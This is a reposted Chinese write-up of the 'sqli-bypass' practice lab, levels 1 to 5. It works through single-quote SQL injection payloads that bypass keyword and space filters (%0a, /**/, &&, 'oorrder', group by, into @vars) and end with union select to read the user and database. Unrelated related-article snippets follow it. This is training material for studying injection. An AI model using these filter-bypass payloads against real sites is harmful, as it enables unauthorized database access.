sqli-bypass wp

sqli-bypass靶场

level 1

尝试注入点

1 ,1'1'',1",1""

==》存在字符型单引号注入

id=1'and(1)--+

==>提示存在sql注入

bypass

and()--+都可能存在被屏蔽掉

  • 尝试#代替--+

    id=1'and(1)%23

    ==》 正常回显,说明–+被屏蔽了,and,()没有屏蔽

  • 尝试空格

    id=1'+and(1)%23

    空格被绕过

  • 尝试%0a,%0b代替空格

    id=1'%0aand%0a(1)%23

    ==》正常回显,%0a没有被绕过。同理%0b/**/%09也没

  • 尝试order by

    id=1'/**/order/**/by/**/10%23

    ==》回显正常,二分法得到列数8

  • 尝试union select

    id=-1'/**/union/**/select/**/1,2,3,4,5,6,7,8%23

    ==>回显为4,5

  • 在回显位进行user,database爆破

    id=-1'/**/union/**/select/**/1,2,3,user(),database(),6,7,8%23

    成功爆破

    image-20231110181416566

level 2

尝试注入点

1 ,1'1'',1",1""

==》存在字符型单引号注入

bypass

  • id=1'--+

    ==》回显正常,–、空格没有被屏蔽

  • id=1'+and+(1)--+

    ==> 回显异常,and或者()被过滤了

    • 尝试%26%26

      ==> 回显正常,and被过滤了,使用&&代替,()没有

    • 同理

      ==> or也被过滤了,使用||代替

  • 爆破列数:id=1'+order+by+10--+

    ==》order by 被过滤了

    • 尝试大小写绕过:id=1'+Order+by+10--+

      ==>回显正常,二分法获取列数8

  • 爆破回显位:id=-1'+union+select+1,2,3,4,5,6,7,8--+

    ==>回显正常,union select没有被屏蔽,得到回显位 4,5

  • 爆破字段:id=-1'+union+select+1,2,3,user(),database(),6,7,8--+

    ==>回显 正常,user,database关键字没有被屏蔽,爆破成功。

    image-20231110184742041

level 3

尝试注入点

1 ,1'1'',1",1""

==》存在字符型单引号注入

bypass

  • 空格是否被屏蔽:id=1'--+

    ==>没有

  • and是否被屏蔽:id=1'+and+1--+

    ==》被屏蔽

    • 尝试%26%26id=1'+%26%26+1--+

      ==> 没有被屏蔽。用%26%26代替and

  • order by是否被屏蔽:id=1'+order+by+1--+

    ==> 没有。通过二分法,爆破列数为8

  • union select是否被屏蔽:id=-1'+union+select+1,2,3,4,5,6,7,8--+

    ==> 没有,爆破列数4,5

  • 爆破字段值:id=-1'+union+select+1,2,3,user(),database(),6,7,8--+

    ==>回显正常,同level2

level 4

尝试注入点

略,同level3,字符型单引号注入

bypass

  • 空格是否被过滤:同level3

    没有

  • and是否被过滤: 同level3

    同level3,使用%26%26代替and

  • order by是否被过滤

    ==>被过滤了

    • 测试order关键字是否被过滤:id=1'+/*order*/--+

      • 测试那个字符被过滤: id=1'+/*oarder*/--+id=1'+/*orader*/--+

        or字段被过滤了,by没有

      • 测试大小写绕过:id=1'+/*oRder*/--+

        被过滤

      • 测试双写绕过:id=1'+/*oorrder*/--+

        被过滤

  • 获取列数

    • order by因为or被过滤了,所有用不了,这里提供两种方式替代

      • group by绕过:`id=1’+group+by+10–+

        `

        image-20231110211152643

        image-20231110211211742

        ==> 爆破8列

      • into绕过:id=1'+into+@1,@2,@3,@4,@5,@6,@7,@8--+

        image-20231110211403126

        image-20231110211433795

        注:into的值要加@,@1,@2,@3...

        ==> 爆破8列

  • union select是否被屏蔽: 同level 3,没有

  • 爆破字段值:同level 3

level 5

尝试注入点

略,同level3,字符型单引号注入

bypass

  • 空格是否被过滤:同level3

    没有

  • and是否被过滤: 同level3

    同level3,使用%26%26代替and

  • order by是否被过滤

    ==>被过滤了,提示显示or字符别过滤了

    image-20231110191329717

    • or之间增加or绕过:id=1'+oorrder+by+8--+

      ==>成功回显,爆破列数8

  • union select是否被屏蔽: 同level 3,没有

    爆破字段值:同level 3

  • order by是否被过滤

    ==>被过滤了,提示显示or字符别过滤了

    image-20231110191329717

    • or之间增加or绕过:id=1'+oorrder+by+8--+

      ==>成功回显,爆破列数8

  • union select是否被屏蔽: 同level 3,没有

  • 爆破字段值:同level 3

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/171696.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

万亿数字新消费赛道,央企纷纷借力破冰

配图来自Canva可画 当前,消费已经成为经济增长的第一拉动力。2023年上半年,最终消费支出对经济增长的贡献率达到77.2%,消费继续保持经济增长的第一拉动力。 消费对经济增长的作用日益突出,恢复消费、提振消费、扩大消费&#xf…

AI 绘画 | Stable Diffusion精确控制ControlNet扩展插件

ControlNet ControlNet是一个用于控制AI图像生成的插件,通过使用Conditional Generative Adversarial Networks(条件生成对抗网络)的技术来生成图像。它允许用户对生成的图像进行更精细的控制,从而在许多应用场景中非常有用&#…

突破职场竞争,引领未来发展:考取《研发效能(DevOps)工程师职业技术认证》

就业形势堪忧,什么最有保障?考个“国家级”证书傍身吧! 工信部教考中心作为中国领先的行业技能认证机构,其颁发的认证证书不仅代表了个人在信息技术领域的专业能力,更可以录入工业和信息化技术技能人才数据库&#xf…

【深度学习】pytorch——常用工具模块

笔记为自我总结整理的学习笔记,若有错误欢迎指出哟~ 深度学习专栏链接: http://t.csdnimg.cn/dscW7 pytorch——常用工具模块 数据处理 torch.utils.data模块DatasetDataLoadersamplertorch.utils.data的使用 计算机视觉工具包 torchvisiontorchvision.d…

JOSEF约瑟 反时限过流继电器JGL-115板前接线5A速断保护

系列型号 JGL-111反时限过流继电器;JGL-112反时限过流继电器; JGL-113反时限过流继电器;JGL-114反时限过流继电器; JGL-115反时限过流继电器;JGL-116反时限过流继电器; JGL-117反时限过流继电器&#xff1b…

PicoDiagnostics (NVH设备软件)-PS软件设置文件类型介绍

作为远程技术指导人员&#xff0c;下面这个功能对你来说可能非常有帮助。 在PicoScope 7 软件的文件保存格式里&#xff0c;通常选择的是<PS 数据文件>类型&#xff0c;容易忽略其他实用的保存文件类型&#xff0c;下面我们介绍<PS设置文件>类型。 PS 数据文件&…

Cnyunwei

运维管理系统&#xff1a;监控系统 Cnyunwei Centos 6 封装 Cacti、Nagios、Centreon&#xff08;中英文自己切换&#xff09;、Check_MK、Nconf英文版本全部采用与国外官方同步的最新版本&#xff0c;会发布32位和64位两个版本。 安装很简单&#xff0c;直接回车即可全自动安…

flink 8081 web页面无法被局域网内其他机器访问

实现 http://localhost:8081/#/overview 可以被局域网其他机器访问

RUST与Python对比分析

1 什么是Rust&#xff1f; Rust 是一种系统编程语言&#xff0c;注重安全性&#xff0c;尤其是并发安全性&#xff0c;支持函数式、命令式和泛型编程范式等多范式语言。Rust 在语法上与 C 类似&#xff0c;但设计者希望在保持性能的同时提供更好的内存安全性。Rust 最初是由 Mo…

单链表经典OJ题(二)

目录 1、链表的回文结构 2、链表分割 3、随机链表的复制 4、相交链表 5、环形链表 6、环形链表二 1、链表的回文结构 链表的回文结构_牛客题霸_牛客网 (nowcoder.com) 回文结构类似于&#xff1a;1->2->3->3->2->1&#xff0c;具体解题思路如下&#xf…

快手自动引流软件的运行分享,以及涉及到技术与核心代码分享

先来看实操成果&#xff0c;↑↑需要的同学可看我名字↖↖↖↖↖&#xff0c;或评论888无偿分享 一、引言 引流是任何网络创业者或营销人员必备的技能之一。手动引流不仅耗时&#xff0c;而且效果难以保证。因此&#xff0c;自动引流软件应运而生&#xff0c;成为许多人的得力助…

MATLAB中ginput函数用法

目录 语法 说明 示例 标识点和绘制坐标 返回用于选择坐标的按键 标识地理坐标区上的点 ginput函数的功能是标识坐标区坐标。 语法 [x,y] ginput(n) [x,y] ginput [x,y,button] ginput(___) 说明 [x,y] ginput(n) 可用于标识笛卡尔坐标区、极坐标区或地理坐标区内…